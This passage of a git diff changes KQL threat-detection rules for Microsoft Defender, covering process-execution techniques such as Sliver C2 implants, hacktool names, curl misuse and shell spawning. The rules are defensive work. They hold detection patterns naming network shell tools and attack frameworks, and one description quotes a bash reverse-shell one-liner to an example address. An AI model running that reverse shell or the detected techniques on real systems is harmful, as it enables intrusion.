+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid="))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql
index 94238395..ed008cb8 100644
--- a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql
+++ b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Sliver C2 Implant Activity Pattern
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022-08-25
-// Level: critical
-// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Sliver C2 Implant Activity Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-08-25
+// Level: critical
+// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/Execution/hacktool_stracciatella_execution.kql
index 67bc7020..0375e44c 100644
--- a/KQL/rules/Execution/hacktool_stracciatella_execution.kql
+++ b/KQL/rules/Execution/hacktool_stracciatella_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Stracciatella Execution
-// Author: pH-T (Nextron Systems)
-// Date: 2023-04-17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Stracciatella Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql
index 4af545e9..6a6dc4e9 100644
--- a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Hardware Model Reconnaissance Via Wmic.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-02-14
-// Level: medium
-// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-
-DeviceProcessEvents
+// Title: Hardware Model Reconnaissance Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql
index dbf7b375..6781bb4a 100644
--- a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql
+++ b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql
@@ -1,12 +1,12 @@
-// Title: Hidden Powershell in Link File Pattern
-// Author: frack113
-// Date: 2022-02-06
-// Level: medium
-// Description: Detects events that appear when a user click on a link file with a powershell command in it
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Legitimate commands in .lnk files
-
-DeviceProcessEvents
+// Title: Hidden Powershell in Link File Pattern
+// Author: frack113
+// Date: 2022-02-06
+// Level: medium
+// Description: Detects events that appear when a user click on a link file with a powershell command in it
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate commands in .lnk files
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
index a28b6a72..56670f14 100644
--- a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
+++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
@@ -1,10 +1,10 @@
-// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql
index b38af5a6..eb08253e 100644
--- a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql
+++ b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql
@@ -1,10 +1,10 @@
-// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-10
-// Level: medium
-// Description: Detects powershell scripts that import modules from suspicious directories
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-10
+// Level: medium
+// Description: Detects powershell scripts that import modules from suspicious directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
index fddb178a..a96b028d 100644
--- a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
+++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
@@ -1,10 +1,10 @@
-// Title: Inline Python Execution - Spawn Shell Via OS System Library
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Inline Python Execution - Spawn Shell Via OS System Library
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql
index a30299b8..81474161 100644
--- a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql
+++ b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql
@@ -1,12 +1,12 @@
-// Title: Insecure Proxy/DOH Transfer Via Curl.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Access to badly maintained internal or development systems
-
-DeviceProcessEvents
+// Title: Insecure Proxy/DOH Transfer Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql
index d98ec616..1538d4d3 100644
--- a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql
+++ b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql
@@ -1,12 +1,12 @@
-// Title: Insecure Transfer Via Curl.EXE
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-30
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "--insecure" flag.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Access to badly maintained internal or development systems
-
-DeviceProcessEvents
+// Title: Insecure Transfer Via Curl.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "--insecure" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
index a5247255..79fa93de 100644
--- a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
+++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
@@ -1,13 +1,13 @@
-// Title: Installation of WSL Kali-Linux
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-10
-// Level: high
-// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
-// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
-
-DeviceProcessEvents
+// Title: Installation of WSL Kali-Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
+// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali"
\ No newline at end of file
diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/Execution/interactive_bash_suspicious_children.kql
index 39f937fb..f0c6cf48 100644
--- a/KQL/rules/Execution/interactive_bash_suspicious_children.kql
+++ b/KQL/rules/Execution/interactive_bash_suspicious_children.kql
@@ -1,12 +1,12 @@
-// Title: Interactive Bash Suspicious Children
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-14
-// Level: medium
-// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036
-// False Positives:
-// - Legitimate software that uses these patterns
-
-DeviceProcessEvents
+// Title: Interactive Bash Suspicious Children
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036
+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
 | where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql
index a3a3354c..d9a5780c 100644
--- a/KQL/rules/Execution/jamf_mdm_execution.kql
+++ b/KQL/rules/Execution/jamf_mdm_execution.kql
@@ -1,12 +1,12 @@
-// Title: JAMF MDM Execution
-// Author: Jay Pandit
-// Date: 2023-08-22
-// Level: low
-// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate use of the JAMF CLI tool by IT support and administrators
-
-DeviceProcessEvents
+// Title: JAMF MDM Execution
+// Author: Jay Pandit
+// Date: 2023-08-22
+// Level: low
+// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate use of the JAMF CLI tool by IT support and administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf"
\ No newline at end of file
diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
index 27fa185e..9016c537 100644
--- a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
+++ b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
@@ -1,12 +1,12 @@
-// Title: JAMF MDM Potential Suspicious Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-22
-// Level: medium
-// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly
-
-DeviceProcessEvents
+// Title: JAMF MDM Potential Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly
+
+DeviceProcessEvents
 | where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf"
\ No newline at end of file
diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/Execution/java_running_with_remote_debugging.kql
index c15627fc..adc88d42 100644
--- a/KQL/rules/Execution/java_running_with_remote_debugging.kql
+++ b/KQL/rules/Execution/java_running_with_remote_debugging.kql
@@ -1,10 +1,10 @@
-// Title: Java Running with Remote Debugging
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
-// MITRE Tactic: Execution
-// Tags: attack.t1203, attack.execution
-
-DeviceProcessEvents
+// Title: Java Running with Remote Debugging
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
index 12d4123c..7db1cc23 100644
--- a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
+++ b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
@@ -1,10 +1,10 @@
-// Title: JXA In-memory Execution Via OSAScript
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-01-31
-// Level: high
-// Description: Detects possible malicious execution of JXA in-memory via OSAScript
-// MITRE Tactic: Execution
-// Tags: attack.t1059.002, attack.t1059.007, attack.execution
-
-DeviceProcessEvents
+// Title: JXA In-memory Execution Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible malicious execution of JXA in-memory via OSAScript
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.t1059.007, attack.execution
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL")
\ No newline at end of file
diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
index f592267e..c4919eb8 100644
--- a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
+++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
@@ -1,13 +1,13 @@
-// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
-// Author: Milad Cheraghi
-// Date: 2025-10-18
-// Level: high
-// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
-// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - System administrator manually stopping Kaspersky services
-
-DeviceProcessEvents
+// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
+// Author: Milad Cheraghi
+// Date: 2025-10-18
+// Level: high
+// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
+// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - System administrator manually stopping Kaspersky services
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh")
\ No newline at end of file
diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/Execution/linux_hacktool_execution.kql
index f8b705fa..4a14b737 100644
--- a/KQL/rules/Execution/linux_hacktool_execution.kql
+++ b/KQL/rules/Execution/linux_hacktool_execution.kql
@@ -1,12 +1,12 @@
-// Title: Linux HackTool Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
-// Date: 2023-01-03
-// Level: high
-// Description: Detects known hacktool execution based on image name.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.resource-development, attack.t1587
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Linux HackTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
+// Date: 2023-01-03
+// Level: high
+// Description: Detects known hacktool execution based on image name.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.resource-development, attack.t1587
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath
contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith "/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan")
\ No newline at end of file
diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/Execution/linux_reverse_shell_indicator.kql
index e5fc34bb..d8967000 100644
--- a/KQL/rules/Execution/linux_reverse_shell_indicator.kql
+++ b/KQL/rules/Execution/linux_reverse_shell_indicator.kql
@@ -1,10 +1,10 @@
-// Title: Linux Reverse Shell Indicator
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-10-16
-// Level: critical
-// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.004
-
-DeviceNetworkEvents
+// Title: Linux Reverse Shell Indicator
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-16
+// Level: critical
+// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/Execution/local_file_read_using_curl_exe.kql
index 3c3dfdb4..beab6efb 100644
--- a/KQL/rules/Execution/local_file_read_using_curl_exe.kql
+++ b/KQL/rules/Execution/local_file_read_using_curl_exe.kql
@@ -1,10 +1,10 @@
-// Title: Local File Read Using Curl.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Local File Read Using Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql
index 2f25ae74..5349e8a2 100644
--- a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql
+++ b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql
@@ -1,10 +1,10 @@
-// Title: Logged-On User Password Change Via Ksetup.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-06
-// Level: medium
-// Description: Detects password change for the logged-on user's via "ksetup.exe"
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Logged-On User Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the logged-on user's via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
index ef949b8f..9a99227f 100644
--- a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
+++ b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
@@ -1,12 +1,12 @@
-// Title: MacOS Scripting Interpreter AppleScript
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-21
-// Level: medium
-// Description: Detects execution of AppleScript of the macOS scripting language AppleScript.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.002
